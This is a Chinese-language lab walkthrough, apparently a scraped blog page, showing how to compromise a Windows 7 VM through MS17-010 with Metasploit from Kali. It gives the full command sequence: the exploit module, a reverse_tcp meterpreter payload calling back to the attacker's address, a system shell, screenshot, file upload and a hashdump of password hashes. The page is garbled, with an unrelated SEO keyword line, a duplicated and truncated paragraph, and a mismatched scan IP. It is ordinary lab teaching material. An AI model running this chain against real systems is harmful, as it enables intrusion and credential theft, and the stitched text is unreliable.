做饮食网站怎么样,公司网站建设的项目工作分解结构,网站开发流程表,免费设计房子的软件情况介绍
攻击机kali中使用ifconfig可以看到ip是192.168.0.106。
靶机Window 7使用ipconfig可以看到ip是192.168.0.100。
Nmap
Nmap全称为Network Mapper#xff0c;又成为“上帝之眼”#xff0c;可以扫描ip和端口。
然后在kali攻击机上使用nmap 192.168.0.103可以看…情况介绍
攻击机kali中使用ifconfig可以看到ip是192.168.0.106。
靶机Window 7使用ipconfig可以看到ip是192.168.0.100。
Nmap
Nmap全称为Network Mapper又成为“上帝之眼”可以扫描ip和端口。
然后在kali攻击机上使用nmap 192.168.0.103可以看一下靶机里边开放的端口和对应服务。
Metasploit
sudo su - root把权限提高至root最高权限。
msfconsole进入到命令里边。
search MS17-010搜索漏洞脚本。
use 0选择攻击脚本。 set rhost 192.168.0.100设置靶机ip为192.168.0.100。 set lhost 192.168.0.106设置攻击地址为192.168.0.106。 set payload windows/x64/meterpreter/reverse_tcp设置攻击脚本。 run进行执行。
getuid看一下登录到Window 7上边的权限。
shell进入到Windows 7命令行里边。
ipconfig查看Windows 7的ip。
可以看到有许多乱码使用chcp 65001修改编码再次使用ipconfig查看Windows 7的ip就发现乱码基本上没有了。
whoami可以看到当前用户是system。
按下Ctrlc然后输入y退出去Window 7命令行。
screenshot截了一张图。
截图打开如下
vim good.txt把test upload写进去。
upload /root/good.txt c:\\good.txt把攻击机kali中/root/good.txt发送到靶机Window 7中c:\\good.txt。
在靶机Window 7中打开c:\\good.txt。
hashdump可以看一下用户信息。
可以在搜索引擎里边搜索meterpreter命令看看其他命令。
我的微信号也是zhaoseaside欢迎大家加我提供实验镜像。